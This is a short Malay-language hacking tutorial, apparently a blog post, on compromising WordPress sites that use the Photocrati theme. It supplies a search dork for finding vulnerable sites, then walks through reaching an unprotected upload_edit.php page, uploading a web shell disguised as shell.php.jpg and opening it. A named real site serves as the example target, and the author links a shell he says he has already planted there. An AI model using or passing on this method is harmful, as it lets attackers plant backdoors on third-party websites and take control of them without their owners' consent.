ok hari ni ku nak ajar exploit wordpress sangat simple upload shell dah terus boleh hack ok jom mulakannya pun aduiii...
Dork nya :-
"inurl:wp-content/themes/photocrati-theme/admin"
ok kembang2 kan la dork nya yach << indon -_-
ok seterusnya
korang akan jumpa website macam ini
http://www.photosbykendel.com/wp-content/themes/photocrati-theme/admin/gallery/gallery-iframe.php?gal_id=65_1&gal_type=1&gal_cap=OFF&gal_page=true&page_template=false&bg=42413F
seterusnya korang cuma perlu ganti dengan upload_edit.php
contohnya macam ini
http://www.photosbykendel.com/wp-content/themes/photocrati-theme/admin/gallery/upload_edit.php
maka akan terpapar tempat nak upload shell macam nie
click bagi besarkan gmbar
ok lepas 2 korang bolehlah upload shell berbentuk shell.php.jpg
ramai tnya mana nak dapat shell.php.jpg ?? korang cuma perlu rename nama shell korang saje jadi shell.php.jpg
dah korang upload tekan menekan add images
ok dah selesai upload shell korang akan kuar di sini
http://www.photosbykendel.com/wp-content/themes/photocrati-theme/galleries/post-/full/shell.php.jpg
contoh shell yang aku dah upload
http://www.photosbykendel.com/wp-content/themes/photocrati-theme/galleries/post-/full/taik.php.jpg
so enjoy!!
